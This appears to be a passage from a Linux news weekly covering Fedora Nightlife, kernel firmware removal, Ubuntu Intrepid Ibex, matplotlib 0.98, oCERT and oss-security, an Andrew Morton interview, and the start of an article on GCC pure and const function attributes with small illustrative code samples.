It seems that the technical issues have largely been addressed in the third
version of the gcov patch.  It can provide useful information, especially for
increasing the reach of test coverage—something that can only help
reduce kernel bugs—so it could make for a nice kernel addition.
Whether it will be picked up into linux-next or 
-mm and pushed towards an eventual mainline merge remains to be seen.


		Fedora harnesses the power of idle computers with Nightlife


Bryan Che, a member of the product management team at Red Hat, recently
introduced Fedora
Nightlife, a project he hopes will motivate people to donate their
computer's downtime to processing data for scientific research and other
socially beneficial work. The heavy lifting will be done by the University
of Wisconsin-Madison's Condor workload management system, which will be
responsible for the scheduling and logistics of donated computer power. In
the end, Che hopes to build a network of more than a million Fedora systems
to help process data for everything from Web-indexing projects to medical
research.
"[W]e have begun talking with the guys over at Wikia about helping them index the Web
for their open source search engine," says Che. "It would be great if we
could help with tasks for the Fedora infrastructure team at some point with
things like automated builds or tests. There is a lot of scientific
research that requires lots of computing power, and there are lots of
students who could use access to a grid for research. I'd love to have all
sorts of projects like these participate."
Che says that the scope and type of projects that join will largely be
dictated by the community, and he's hoping to draw on its collective
expertise to "shape Nightlife into a useful community service." His end
goal, however, isn't just to make computer resources available but also to
develop a basis for larger infrastructure projects. Che notes, "For
example, much of the high performance computing (HPC) jobs these days are
done on Linux — and particularly Fedora or Red Hat. This puts us in a
prime position to be able to shape and build out an entire open source
stack for research computing on grids. Today, many people depend upon
proprietary (and often costly) libraries for their scientific research or
even enterprise computing. Nightlife will provide us a great forum to
engage these users to see what are their needs and provide them with a
fully open source solution that they can use for their valuable
research."
Naturally, security is of primary importance when individual computers
are clustered together or outside data is inserted into a system for
processing. Che says the Nightlife team takes security very seriously and
has a number of measures in place to protect users' computers and ensure
the application code is safe as well.
"[W]e will require that projects that want to leverage Nightlife must
distribute their packages and source code through Fedora," explains
Che. "This will allow us to inspect what the applications are doing and
make sure there isn't anything malicious. On the execution side, one of the
capabilities that we've added to Condor recently is integration with our
libvirt virtualization technology. This will enable people to execute
Nightlife jobs entirely within a virtual machine bubble that is shielded
from their physical computers.
"We are also looking at taking advantage of SELinux technology, which we've
developed with the NSA, as a mechanism for
tightly locking down jobs so that they can only perform tasks for which
they are explicitly granted permission."
Che is quick to point out that although Fedora has committed plenty of
resources to Nightlife, it is not Fedora-specific — indeed it's not
even Linux-specific. Since Condor supports executing processes on many
different platforms, Mac OS, Windows, Unix, and Linux distributions of any
flavor are capable of donating resources. Not all features will be
available on non-Linux platforms, however, if they lack certain underlying
technologies. For instance, Windows lacks a built-in hypervisor for running
virtual environments and doesn't support SELinux for lock-downs.
"I would welcome anyone to donate spare capacity to Nightlife [and] I'd
hope that people from all sorts of platforms join us," encourages
Che. "[T]here isn't any reason why other communities couldn't participate
with us and even start adding some of these capabilities to a Nightlife
client for their platforms. From a development standpoint, the upstream
code lives in the Condor project at the University of Wisconsin. So, anyone
can contribute at that project as well without having any involvement with
Fedora."
When the project was announced last week, some community
members were puzzled as to why Fedora chose to use Condor instead of BOINC,
a similar project developed by the University of California, Berkeley. Che points out
that, though the two efforts have a lot in common, they each have an
entirely different focus. He says BOINC's mission is "very much focused on
enabling desktops/laptops to provide computing capacity as part of a larger
grid [while] Condor is more general-purpose; it can take idle capacity and
utilize it well, but it is primarily a good resource scheduler for
dedicated grids."
While some people's comparisons of Condor and BOINC focus on the
technology behind the projects, others see similarities between the Condor
and Nightlife projects themselves. In actuality, they are really quite
different. "Condor's client can use a BOINC client to process data as
backfill (when there are no other jobs to run)," notes Che. "So, there is
no need to view these projects as competitive. Indeed, one possibility is
to use Nightlife to increase the number of machines participating in
BOINC." Of course, a low barrier to entry is also important for widespread
adoption of Nightlife. Since many enterprises and researchers already run
Condor for their dedicated grids, Che says it was a logical choice for the
project.
Dr. Keith Laidig can easily see the intrinsic value of Nightlife and how
it will benefit the scientific community at large. He runs the computing
infrastructure for the computational biophysics group in the Department of
Biochemistry at the University of Washington, and regularly relies on outside
computing power to crunch data for researchers. Under the direction of
Professor David Baker, about four years ago the group created Robetta, an
automated prediction server that farms out work to other systems via Condor,
which has proven
"quite successful at keeping the wait times [for research results] down to
the range of 'months'."
Laidig recently told
the Nightlife community, "If we had access to more computing power,
even that available from modest periods of inactivity, we could put that
power to work to address many pressing issues in bio-medical research such
as HIV/AIDS vaccine design, improvement of existing drugs and/or design new
drugs, and creation of new methods to harness biology to address issues
such as carbon sequestration."

As Laidig explained to LWN, reducing the wait times for results to even
a matter of weeks is not out of the question. "Given sufficient computing
power, the processing time would drop even further. In principle, the
processing could take a day or less — depending on computing power,
queue depth, etc."
Laidig says it's hard to estimate just how much donated computer access
his lab would need in order to see an appreciable improvement in research
turnaround time, but he estimates they currently use around 300 to 400
processors running around the clock to maintain the current
workflow. "Should we gain, say, 1,500 machines that could work for 8
hours... we'd be matching that — taking into account overhead. Now,
I'd like to increase that by a factor of ten or more."
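Laidig's comparison can be checked with simple arithmetic. The sketch below
assumes, purely for illustration, that one donated machine does the same
work per hour as one of the lab's processors; the function and variable
names are hypothetical.

```python
HOURS_PER_DAY = 24


def machine_hours_per_day(machines, hours_each):
    """Total machine-hours delivered in one day."""
    return machines * hours_each


# The lab's current load: 300 to 400 processors around the clock.
current_low = machine_hours_per_day(300, HOURS_PER_DAY)
current_high = machine_hours_per_day(400, HOURS_PER_DAY)

# The hypothetical donation: 1,500 machines for 8 hours each.
donated = machine_hours_per_day(1500, 8)

# Share of the donated time that could be lost to overhead while
# still matching the current workload.
overhead_if_high = 1 - current_high / donated
overhead_if_low = 1 - current_low / donated

print(current_low, current_high, donated)
print(round(overhead_if_high, 2), round(overhead_if_low, 2))
```

Under that assumption the donated pool supplies 12,000 machine-hours a day
against the 7,200 to 9,600 used now, so between a fifth and two fifths of
the donated time could go to overhead before the two stop matching.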
Though he would be happy to see Nightlife flourish, Laidig notes there
are some things to consider before committing your computer's resources to
the project. "Not to throw a wet blanket on things, but [there are] issues
that folks should keep in mind. Their gear would be using electricity and
generating heat. There are also network bandwidth considerations as well
— some data-sets necessary to undertake distributed work can be
sizable (100 MBs) which can soak up resources. There's the local disk space
usage, too.
"Folks should be made aware of the 'costs' of contributing. Then, should
their desire to contribute outweigh the costs, they should join up!"
Some community members have indeed expressed concerns about the
energy consumption associated with idling computers and suggest that the
ecological harm of running the CPUs and fans of an unattended machine
outweighs the benefit of charity in the name of science. In response to an
animated discussion about Nightlife at Slashdot, one enterprising
commenter measured how much energy his idle computer uses and found that
it cost upwards of $70 per year. Che responded
to the criticism by acknowledging that although cycle harvesting can be
viewed as a "waste of energy," it can, in fact, save energy in the
long run. Besides the argument that the energy needed to process the data
would be consumed somewhere anyway, Nightlife also
distributes energy consumption over a wide geographical area, thereby
reducing the overall energy burden on a single data center or location.
Future plans for Nightlife include making it a first-boot option for
Fedora so when a user does a fresh install, they are prompted to donate
computer power to the project. Of course, before Che can attain his
million-node goal, there are several smaller goals to accomplish along the
way. "At the earliest, we wouldn't be able to start reaching numbers at
this level until after Fedora 10 — and that's probably pushing
it."

		Moving the firmware out


It seems that David Woodhouse had a bit of an ulterior motive when he recently
reworked the kernel firmware
loader.  That is not to say the work is not useful in its own right,
but one of his goals is more apparent now: removing all of the firmware
from the 
kernel source tree.  By making it easy to separate the firmware
blobs—while still allowing them to be statically built into
kernels—he has provided a possible path for all firmware needed by
any Linux driver to live in a single place.


The firmware issue is somewhat contentious, with licensing and political
issues that tend to annoy the kernel developers.  Arguments about the
"legality" of distributing firmware with the kernel flare up from time to
time.  Separate from that, there are some good reasons why it makes sense
to keep the firmware in its own place: some distributions need or want to
distribute their kernels without firmware blobs and some hardware
manufacturers will not allow their firmware to be distributed with the
kernel because of concerns about the GPL.  The current situation makes it
harder for both users and distributors.


Woodhouse brought up the idea of pulling the firmware out of the kernel in
a post to linux-kernel and
ksummit-2008-discuss.  The agenda for this year's Kernel Summit is
under discussion, so he proposed that it be discussed there.  He is clearly
trying to anticipate the technical concerns that others might have:

 By the time the kernel summit comes around, we should have made decent
progress on moving _all_ the firmware blobs to the firmware/ directory.
And at that point I'd like to remove them completely, to a separate git
tree and tarball. Those who really want to build them in to their static
kernel would still be able to, but it wouldn't be the default behaviour.


Unsurprisingly, there are some fairly strenuous objections.  David Miller
is quite annoyed:


Sorry, that's taking things too far.  I've fought, like, forever, to
keep the tg3 driver with it's firmware in-tree.  I refuse to let the
driver get broken like that, it's staying working, and that means
in-tree and linked into the driver.

If debian or whoever else have these concerns and want to rip the
firmware out, it is one hundred percent their problem to patch things
out of the kernel tree they use.


But there are other reasons to collect firmware in one single place, as
Arjan van de Ven notes:

Right now it's a royal pain for users to get all the right pieces of
firmware.... having ONE place to put all that would go a long way of making
that side of things easier.

If you want to argue that that should be in the kernel tarball itself, you
won't hear me complain. But others will... and for that a 2nd tarball might
well be the answer.
Just we shouldn't need 100 tarballs.

There is a very real concern, though, that putting firmware without source
into the kernel is a GPL violation.  It is impossible to know for sure
without a court decision, which is something that no one wants to have to
deal with.  Companies—and their lawyers—tend to be very
conservative when it comes to inviting lawsuits, so removing unrelated,
possibly actionable code from the kernel sources is of great benefit to
them.  As Woodhouse says:

And it isn't just the nutters. Fedora also wants to ship the firmware in
a separate package from the kernel -- since the alleged GPL violation is
such a _gratuitous_ risk given that we always use an initrd anyway, and
because people want to be able to do 'Free' spins which don't feature
the firmware at all, even in the source packages.


By making it easier to put all of the firmware in one non-GPL tree,
hardware vendors—and their lawyers—may be willing to
allow the firmware to be distributed.  If Woodhouse's plan for supporting
both compile-time and runtime loading of the firmware is successful and
reasonably transparent, there
should be little difference for kernel developers, but big improvements for
users and distributors.  It is unclear whether this is something that will
be resolved in email, as Woodhouse hopes, or will require a discussion at
the Kernel Summit in September, but it's an idea with a lot of merit that
may find its way into the mainline at some point.


		What's up with the Intrepid Ibex


The ibex is a type of wild mountain goat with large recurved horns that are
transversely ridged in front, found in Eurasia, North Africa, and East
Africa.  That is the Wikipedia
definition.  For the Ubuntu community, the Intrepid Ibex is the next
version of the operating system, and the topic under discussion at the
recent Ubuntu Developer
Summit (UDS) in Prague.

There are a number of YouTube videos from the
UDS, with Mark Shuttleworth and others talking about Intrepid Ibex and
related topics.  Mark's two part video covers the various versions of
Ubuntu from the server to the platform specific remixes, to collaboration
with other distributions and upstream developers, and more.

The Intrepid Ibex, scheduled for release next October, will also be known
as version 8.10 - 8 for the year and 10 for the month of its release.  With
the Hardy Heron, Ubuntu's second LTS (Long Term Support) release out the
door, the Ibex marks the beginning of a new LTS cycle.  As such, it is
likely to be a bit wild and woolly: a time to bring in new technology and
experiment with possibilities.  There will be plenty of time later for
stabilizing the next LTS release, Ubuntu 10.04 LTS, scheduled for release in
April 2010.
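
The numbering scheme described above (the year, then the month of release)
can be written as a one-line function. This is a small sketch; the name
ubuntu_version is made up for the example, and it only makes sense for
releases from 2000 onward.

```python
def ubuntu_version(year, month):
    """Return the Ubuntu version string for a release in the given month."""
    # Year without the century, then a zero-padded two-digit month.
    return f"{year % 100}.{month:02d}"


print(ubuntu_version(2008, 10))
print(ubuntu_version(2010, 4))
```

The month is zero-padded, which is why an April release is written 10.04
rather than 10.4.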

This UDS had several tracks; some reports are available:

 Community looks at getting the community involved in a helpful way
 Server looks at improving Ubuntu as a server distribution
 Platform covers 3G networking, the Education Edition, Firefox KDE
  integration, boot performance and more
 QA looks at how to measure quality, and bug tracking issues
 Desktop points to several other wiki documents dealing with single sign
  on, Compiz and other desktop topics.

ItWire takes a
look at the new features planned for Ubuntu's Intrepid Ibex and hopes
for improved wireless networking.
"Two key design goals were announced from the beginning. Firstly, the
user interaction model will be re-engineered to ensure Ubuntu works as well
as responsively as possible on hardware ranging from squinty little
subnotebooks through to high-end powerful workstations. Secondly, and the
one on my mind, is the goal of pervasive internet access. Ubuntu have
explicitly stated they wish this release of Ubuntu - finally - to tap into
bandwidth wherever you may be. Once more the goat metaphor comes to the
fore, 'No longer will you need to be a tethered, domesticated animal -
you'll be able to roam (and goats do roam!) the wild lands and access the
web through a variety of wireless technologies. We want you to be able to
move from the office, to the train, and home, staying connected all the
way.'"

Cody Somerville, leader of Xubuntu, tells us Why Xubuntu Intrepid is going to
rock.  The Xubuntu
Intrepid Strategy document contains a clear mission statement and takes
a deeper look at this variant:

Xubuntu will provide (The goal of Xubuntu is to produce) an easy to use
distribution, based on Ubuntu, using Xfce as the graphical desktop, with a
focus on integration, usability and performance, with a particular focus on
low memory footprint. The integration in Xubuntu is at a configuration
level, a toolkit level, and matching the underlying technology beneath the
desktop in Ubuntu. Xubuntu will be built and developed autonomously as part
of the wider Ubuntu community, based around the ideals and values of
Ubuntu.


Kubuntu fans will find this entry in Jonathan Riddell's
blog of interest.  "Kubuntu Intrepid Version makes the decision
to move to KDE 4 by default (anything else is history). KDE 3 libs will
still be available for applications without a KDE 4 version, but the
desktop won't be. It's a good time to move to KDE 4 since Intrepid is
intended to be a more cutting edge release."  The Kubuntu Intrepid
wiki takes a look at some specific design goals for the KDE variant.  Some of
the defaults
for Kubuntu have been defined.

We will remove sounds for actions. Actions do not need to attract the
user's attention. We would like a new, shorter, login sound, Scott Wheeler
has volunteered to make one.

At the 4.1 release we will consider which default Plasmoids to include. The
Desktop Plasmoid should be on by default.
 And so on.

Other goals for Intrepid are still somewhat fuzzy, which means there is
still time to make proposals for what you want.  If you run Ubuntu (or a
variant thereof) but it's not quite what you want it to be, get involved and
help make it better.

		Matplotlib announces a major release


Matplotlib
is a cross-platform numerical plotting and analysis library for Python:


matplotlib is a python 2D plotting library which produces publication quality figures in a variety of hardcopy formats and interactive environments across platforms. matplotlib can be used in python scripts, the python and ipython shell (ala matlab or mathematica), web application servers, and six graphical user interface toolkits.
matplotlib tries to make easy things easy and hard things possible. You can generate plots, histograms, power spectra, bar charts, errorcharts, scatterplots, etc, with just a few lines of code.


Matplotlib was last examined on LWN in January 2005, at version 0.71.
Recently, major release version 0.98.0 was announced:


matplotlib 0.98.0 is a major release which requires python2.4 and numpy 1.1. It contains significant improvements and may require some advanced users to update their code; see migration and API_CHANGES. We are supporting a maintenance branch of the older code available at matplotlib 0.91.3.


The major changes in matplotlib 0.98.0 include a complete rewrite of the
transformation infrastructure and new support for user-defined
transformations and projections.  The full list of changes is
available in the
CHANGELOG file.
The new matplotlib release coincides with the new release (version 1.1.0)
of NumPy, the fundamental package needed for scientific computing with
Python:


"This is the first minor release since the 1.0 release in
October 2006. There are a few major changes, which introduce
some minor API breakage. In addition this release includes
tremendous improvements in terms of bug-fixing, testing, and
documentation."


Looking forward, the Goals document explains a number of new matplotlib
capabilities that are in the planning and development stages.


If you need to create any number of scientific data plots,
matplotlib is an excellent choice for the job.  It truly lives
up to the claim of being easy to use.
The latest matplotlib source code is available for download here.
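
As a rough illustration of the "few lines of code" claim, the sketch below
draws a line plot and a histogram and saves them to a PNG file. It is written
against the pyplot interface found in current matplotlib releases, which is
not necessarily identical to the 0.98.0 API; the function name
make_demo_figure and the output file name are made up for the example.

```python
import math
import os
import random
import tempfile

import matplotlib
matplotlib.use("Agg")  # render off-screen, so no GUI toolkit is needed
import matplotlib.pyplot as plt


def make_demo_figure(path):
    """Draw a sine curve and a histogram side by side, then save to path."""
    xs = [i * 0.1 for i in range(100)]
    ys = [math.sin(x) for x in xs]
    rng = random.Random(0)  # fixed seed so the histogram is repeatable
    samples = [rng.gauss(0.0, 1.0) for _ in range(1000)]

    fig, (ax_line, ax_hist) = plt.subplots(1, 2, figsize=(8, 3))
    ax_line.plot(xs, ys)
    ax_line.set_title("sin(x)")
    ax_hist.hist(samples, bins=30)
    ax_hist.set_title("Gaussian samples")
    fig.savefig(path)
    plt.close(fig)
    return path


out = make_demo_figure(os.path.join(tempfile.gettempdir(), "matplotlib_demo.png"))
print(out)
```

Selecting the Agg backend keeps the example usable on a machine without a
display; in an interactive session one would typically call plt.show()
instead of saving to a file.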


		oCERT and oss-security


Two recently announced organizations, the Open Source Computer Emergency Response
Team (oCERT) and Open Source Software
Security (oss-security), are both looking to assist projects with
security issues in a complementary way.  Each is focusing on different kinds
of problems that free software projects face when trying to secure
their code. 


oCERT is modeled on the various national CERT organizations, but focused on
free software:

The service aims to help both large infrastructures, like major
distributions, and smaller projects that can't afford a full-blown security
team and/or security resources. This means aiding coordination between
distributions and small project contacts. The goal is to reduce the impact
of compromises on small projects with little or no infrastructure security,
avoiding the ripple effect of badly communicated or handled compromises,
which can currently result in distributions shipping code which has been
tampered with. 


In addition, oCERT is doing vulnerability research on free software
projects.  So far, they have released four
advisories after coordinating with the affected projects and
distributions.  It is a way for team members—or anonymous
researchers—to collect their vulnerability research and push it
through the process.  


The oCERT team
consists of five security professionals from Inverse Path, Google, and
Intel, along with a two-person advisory board.  Various projects have also
signed up as members including several Linux distributions, security and
other free software tools, as well as OpenBSD.  In order to become a
member, a project or organization must meet some fairly stringent membership requirements
that include agreeing to the disclosure policy.  Others can submit
vulnerability information without becoming a member.


oss-security is more of an open group, without any formal membership, that
is looking to foster more discussion of security issues:

The purpose of oss-security is to encourage public discussion of security
flaws, concepts, and practices in the open source community.  We don't want
to simply be an information clearinghouse, or to replace any of the current
security lists and groups.  The goal is to fill an existing vacuum by
encouraging active participation of those interested in the ideas and
unique challenges in securing Open Source software.  This includes
activities such as flaw discovery, understanding, reporting, and overall
best practices.


The oss-security
mailing list is one of the focal points of the group's efforts.  Some of
the topics currently being discussed are helping projects with code
reviews, getting CVE IDs assigned for specific vulnerabilities, and the
IP address change of the "L" root nameserver.


The oss-security wiki
seeks to gather relevant security information from projects and vendors in
a single location.  This includes security contacts, helpful mailing lists,
bug tracker locations, distribution security patch repositories, and the
like.  If it gets fully populated and is kept up-to-date, it will be a
tremendous resource for the community. 


Up to a certain point, more organizations looking to improve free software
security can only be a good thing.  Each of these seems to have a focus
that is not met by existing groups, so they can hopefully fill a need in the
community.  The private, vendor-sec
mailing list has long been used by distributors, whereas oCERT and
oss-security are more focused on the project side of the equation.  With
luck, that will lead to better code and more coordination for projects
and distributions.  


		Andrew Morton on kernel development


Andrew Morton is well-known in the kernel community for doing a wide
variety of different tasks: maintaining the -mm tree for patches that may be
on their way to the mainline, reviewing lots of patches, giving
presentations about working with the community, and, in general, handling
lots of important and visible kernel development chores.  Things are
changing in the way he does things, though, so we asked him a few questions
by email.  He responded at length about the -mm tree and how that is
changing with the advent of linux-next, kernel quality, and what folks can
do to help make the kernel better.


Years ago, there was a great deal of worry about the possibility of burning
out Linus.  Life seems to have gotten easier for him since then; now
instead, I've heard concerns about burning out Andrew.  It seems that you
do a lot; how do you keep the pace and how long can we expect you to stay
at it?


I do less than I used to.  Mainly because I have to - you can't do
the same thing at a high level of intensity for over five years and
stay sane.

I'm still keeping up with the reviewing and merging but the -mm release
periods are now far too long.

There are of course many things which I should do but which I do not.

Over the years my role has fortunately decreased - more maintainers are
running their own trees and the introduction of the linux-next tree
(operated by Stephen Rothwell) has helped a lot.

The linux-next tree means that 85% of the code which I used to
redistribute for external testing is now being redistributed by
Stephen.  Some time in the next month or two I will dive into my
scripts and will find a way to get the sufficiently-stable parts of the
-mm tree into linux-next and then I will hopefully be able to stop
doing -mm releases altogether.

So.  The work level is ramping down, and others are taking things on.


What can we do to help?


I think code review would be the main thing.  It's a pretty specialised
function to review new code well.  The people who specialise in the
area which the new code is changing are the best reviewers but
unfortunately I will regularly find myself having to review someone
else's stuff.

Secondly: it would help if people's patches were less buggy.  I still
have to fix a stupidly large number of compile warnings and compilation
errors and each -mm release requires me to perform probably three or
four separate bisection searches to weed out bad patches.

Thirdly: testing, testing, testing.

Fourthly: it's stupid how often I end up being the primary responder on
bug reports.  I'll typically read the linux-kernel list in 1000-email
batches once every few days and each time I will come across multiple
bug reports which are one to three days old and which nobody has done
anything about!  And sometimes I know that the person who is
responsible for that part of the kernel has read the report.  grr.  


Is it your opinion that the quality of the kernel is in decline?  Most
developers seem to be pretty sanguine about the overall quality problem.
Assuming there's a difference of opinion here, where do you think it comes
from?  How can we resolve it?


I used to think it was in decline, and I think that I might think that
it still is.  I see so many regressions which we never fix.  Obviously
we fix bugs as well as add them, but it is very hard to determine what
the overall result of this is.

When I'm out and about I will very often hear from people whose
machines we broke in ways which I'd never heard about before.  I ask
them to send a bug report (expecting that nothing will end up being
done about it) but they rarely do.

So I don't know where we are and I don't know what to do.  All I can do
is to encourage testers to report bugs and to be persistent with them,
and I continue to stick my thumb in developers' ribs to get something
done about them.

I do think that it would be nice to have a bugfix-only kernel release. 
One which is loudly publicised and during which we encourage everyone
to send us their bug reports and we'll spend a couple of months doing
nothing else but try to fix them.  I haven't pushed this much at all,
but it would be interesting to try it once.  If it is beneficial, we
can do it again some other time.


There have been a number of kernel security problems disclosed recently.
Is any particular effort being put into the prevention and repair of
security holes?  What do you think we should be doing in this area?


People continue to develop new static code checkers and new runtime
infrastructure which can find security holes.

But a security hole is just a bug - it is just a particular type of
bug, so one way in which we can reduce the incidence rate is to write
less bugs.  See above.  More careful coding, more careful review, etc.

Now, is there any special pattern to a security-affecting bug?  One
which would allow us to focus more resources on preventing that type of
bug than we do upon preventing "average" bugs?  Well, perhaps.  If
someone were to sit down and go through the past five years' worth of
kernel security bugs and pull together an overall picture of what our
commonly-made security-affecting bugs are, then that information could
perhaps be used to guide code-reviewers' efforts and code-checking
tools.

That being said, I have the impression that most of our "security
holes" are bugs in ancient crufty old code, mainly drivers, which
nobody runs and which nobody even loads.  So most metrics and
measurements on kernel security holes are, I believe, misleading and
unuseful.

Those security-affecting bugs in the core kernel which affect all
kernel users are rare, simply because so much attention and work gets
devoted to the core kernel.  This is why the recent splice bug was such
a surprise and head-slapper.


I have sensed that there is a bit of confusion about the difference between
-mm and linux-next.  How would you describe the purpose of these two trees?
Which one should interested people be testing?


Well, things are in flux at present.

The -mm tree used to consist of the following:


80-odd subsystem maintainer trees (git and quilt), eg: scsi, usb,
net.
various patches which I picked up which should be in a subsystem
  maintainer's tree, but which for one of various reasons didn't get
  merged there.  I spend a lot of time acting as backup for leaky
  maintainers.
patches which are mastered in the -mm tree.  These are now
  organised as subsystems too, and I count about 100 such subsystems
  which are mastered in -mm.  eg: fbdev, signals, uml, procfs.  And
  memory management.
more speculative things which aren't intended for mainline in the
  short-term, such as new filesystems (eg reiser4).
debugging patches which I never intend to go upstream.


The 80-odd subsystem trees in fact account for 85% of the changes which
go into Linux.  Pretty much all of the remaining 15% are the only-in-mm
patches.

Right now (at 2.6.26-rc4 in "kernel time"), the 80-odd subsystem trees
are in linux-next.  I now merge linux-next into -mm rather than the
80-odd separate trees.

As mentioned previously, I plan to move more of -mm into linux-next -
the 100-odd little subsystem trees.

Once that has happened, there isn't really much left in -mm.  Just

the patches which subsystem maintainers leaked.  I send these to
  the subsystem maintainers.
the speculative not-for-next-release features
the not-to-be-merged debugging patches.


Do you have any specific goals for the development of the kernel over the
next year or so?  What would they be?


Steady as she goes, basically.

I keep on hoping that kernel development in general will start to
ramp down.  There cannot be an infinite number of new features
out there!  Eventually we should get into more of a maintenance
mode where we just fix bugs, tweak performance and add new
drivers.  Famous last words.

And it's just vaguely possible that we're starting to see that
happening now.  I do get a sense that there are less "big" changes
coming in.  When I sent my usual 1000-patch stream at Linus for 2.6.26
I actually received an email from him asking (paraphrased) "hey,
where's all the scary stuff?"


In the early-May discussions, Linus said a couple of times that he does not
think code review helps much.  Do you agree with that point of view?


Nope.


How would you describe the real role of code review in the kernel
development process?


Well, it finds bugs.  It improves the quality of the code. 
Sometimes it prevents really really bad things from getting into
the product.  Such as rootholes in the core kernel.  I've spotted
a decent number of these at review time.

It also increases the number of people who have an understanding
of the new code - both the reviewer(s) and those who closely
followed the review are now better able to support that code.

Also, I expect that the prospect of receiving a close review will
keep the originators on their toes - make them take more care
over their work.


There clearly must be quite a bit of communication between you and Linus,
but much of it, it seems, is out of the public view.  Could you describe
how the two of you work together?  How are decisions (such as when to
release) made?


Actually we hardly ever say anything much.  We'll meet
face-to-face once or twice a year and "hi how's it going".

We each know how the other works and I hope we find each other
predictable and that we have no particular issues with the
other's actions.  There just doesn't seem to be much to say,
really.


Is there anything else you would like to say to LWN's readers?


Sure.  Please do contribute to Linux, and a great way of doing that is
to test latest mainline or linux-next or -mm and to report on any
problems which you encounter.

Nothing special is needed - just install it on as many machines
as you dare and use them in your normal day-to-day activities.

If you do hit a bug (and you will) then please be persistent in
getting us to fix it.  Don't let us release a kernel with your
bug in it!  Shout at us if that's what it takes.  Just don't let
us break your machines.

Our testers are our greatest resource - the whole kernel project
would grind to a complete halt without them.  I profusely thank
them at every opportunity I get :)


We would like to thank Andrew for taking time to answer our questions.

		Implications of pure and constant functions


Introduction
Attributes and why you should use them

      Free Software development is often a fun task for developers,
      and it is its low barrier to entry (on average) that makes it
      possible to have so much available software for so many
      different tasks. This low barrier to entry, though, is also
      probably the cause of the widely varying quality of the code of
      these projects.
    
      Most of the time, the quality issues one can find are not
      related to developers' lack of skill, but rather to lack of
      knowledge of how the tools work, in particular, the
      compiler. For non-interpreted languages, the compiler is
      probably the most complex tool developers have to deal
      with. Because a lot of Free Software is written in C, GCC is
      often the compiler of choice.
    
      Modern compilers are also supposed to do a great job at
      optimizing the code by taking code, often written with
      maintainability and readability in mind, and translating it into
      assembler code with a focus on performance. Code analysis for
      optimization (which is also used for warnings about the code)
      has the task of taking a semantic look at the code, rather than
      syntactic, and identifying various fragments of algorithms that
      can be replaced with faster code (or with code that uses a
      smaller memory footprint, if the user desires to do so).
    
      This task is a pretty complex one and relies on the compiler
      knowing about the function called by the code. For instance, the
      compiler might know when to replace a call to a (local, static)
      function with its body (inlining) by
      looking at its size, the number of times it is called, and its
      content (loops, other calls, variables it uses). This is because
      the compiler can give a semantic value to the code for a
      function, and can thus assess the costs and benefits of a
      particular transformation at the time of its use.
    
      I specified above that the compiler knows when to
      inline a function by looking at its
      content. Almost all optimizations related to function calls work
      this way: the compiler, knowing the body of a function, can
      decide when it is worthwhile to replace a call with its body; when
      it is possible to completely avoid calling the function at all;
      and when it is possible to call it just once and thereby
      avoid multiple calls. This means, though, that these
      optimizations can be applied only to functions that are defined
      in the same unit in which they are used. These functions are
      usually limited to static functions (functions that are not
      defined as static can often be overridden both at link time and
      runtime, so the compiler cannot safely assume that what it finds
      in the unit is what the code will be calling).
    
      As this is far from optimal, modern compilers like GCC provide a
      way for the developer to provide information about the semantics
      of a function, through the use of
      attributes attached to declarations of
      functions and other symbols. These attributes provide
      information to the compiler on what the function does, even
      though its body is not available. Consequently, the compiler can
      optimize at least some of its calls.
    
      This article will focus on two particular attributes that GCC
      makes available to C developers: pure and
      const, which can declare a function as
      either pure or
      constant. The next section will provide a
      definition of these two kinds of functions, and after that I'll
      get into an analysis of some common optimizations that can be
      performed on the calls of these functions.
    
      As with all the other function attributes supported by GCC and
      ICC, the pure and
      const attributes should be attached to the
      declarative prototype of the function, so that the compiler knows
      about them when it finds a call to the function even without its
      definition. For static functions, the attribute can be attached
      to the definition by putting it between the return type and the
      name of the function:
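A minimal sketch of both placements follows. The function names are hypothetical and only illustrate where GCC accepts the attribute; the bodies are there so the sketch compiles on its own.

```c
#include <stddef.h>

/* Hypothetical prototypes: the attribute follows the declarator. */
size_t count_spaces(const char *text) __attribute__((pure));
int square(int value) __attribute__((const));

/* Static function: the attribute sits between the return type and
 * the name, directly on the definition. */
static int __attribute__((const)) cube(int value)
{
    return value * value * value;
}

/* Reads the string it is given but modifies nothing. */
size_t count_spaces(const char *text)
{
    size_t count = 0;

    for (; *text != '\0'; text++)
        if (*text == ' ')
            count++;
    return count;
}

/* Depends only on the value of its parameter. */
int square(int value)
{
    return value * value;
}

/* Uses the static helper so that it is not reported as unused. */
int cube_plus_square(int value)
{
    return cube(value) + square(value);
}
```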
    Pure and Constant Functions
      For the purposes of this article, functions can be divided
      into three categories, from the smallest to the biggest:
      constant functions, pure
      functions, and the remaining functions, which can be called
      normal functions.
    
      As you can guess, constant functions are also pure functions,
      but not all pure functions are constant
      functions. In many ways, constant functions are a special case
      of pure functions. It is, therefore, best to first define pure
      functions and how they differ from all the rest of the
      functions.
    
      A pure function is a function with basically no
      side effect. This means that pure functions return a value that
      is calculated based on given parameters and global memory, but
      cannot affect the value of any other global variable. Pure
      functions cannot reasonably lack a return type
      (i.e. have a void return type).
    
      GCC documentation provides strlen() as an
      example of a pure function. Indeed, this function takes a pointer
      as a parameter, and accesses it to find its length. This
      function reads global memory (the memory pointed to by
      parameters is not considered a parameter), but does not change
      it, and the value returned derives from the global memory
      accessed.
    
      An example of a function that is not pure is the
      strcpy() function. This function takes two
      pointers as parameters. It accesses the latter to read the
      source string, and the former to write to the destination
      string. As I said, the memory areas pointed to by the parameters
      are not parameters on their own, but are considered global
      memory and, in that function, global memory is not only accessed for
      reading, but also for writing. The return value derives directly
      from the parameters (it is the same as the first parameter), but
      global memory is affected by the side effect of
      strcpy(), making it not pure.
    
      Because the global memory state remains untouched, two calls
      to the same pure function with the same parameters will have to
      return the same value. As we'll see, it is a very important
      assumption that the compiler is allowed to make.
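To make the distinction concrete, here is a small sketch with hypothetical functions (none of them come from a real library). One only reads memory and can therefore be declared pure; the other writes through a parameter, as strcpy() does, and cannot.

```c
#include <stddef.h>

/* Hypothetical global, read but never written by the pure function. */
int padding = 2;

/* Pure: the result depends only on the argument, the string it points
 * to, and the global above; nothing is modified. */
size_t padded_length(const char *text) __attribute__((pure));

/* Not pure: writes to the memory its first parameter points to. */
char *copy_text(char *dest, const char *src);

size_t padded_length(const char *text)
{
    size_t length = 0;

    while (text[length] != '\0')
        length++;
    return length + (size_t)padding;
}

char *copy_text(char *dest, const char *src)
{
    char *out = dest;

    while ((*out++ = *src++) != '\0')
        ;
    return dest;
}

/* Nothing changes memory between the two calls, so the compiler is
 * allowed to evaluate padded_length(text) once and reuse the result. */
size_t doubled(const char *text)
{
    return padded_length(text) + padded_length(text);
}
```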
    
      A special case of pure functions is constant functions. A pure
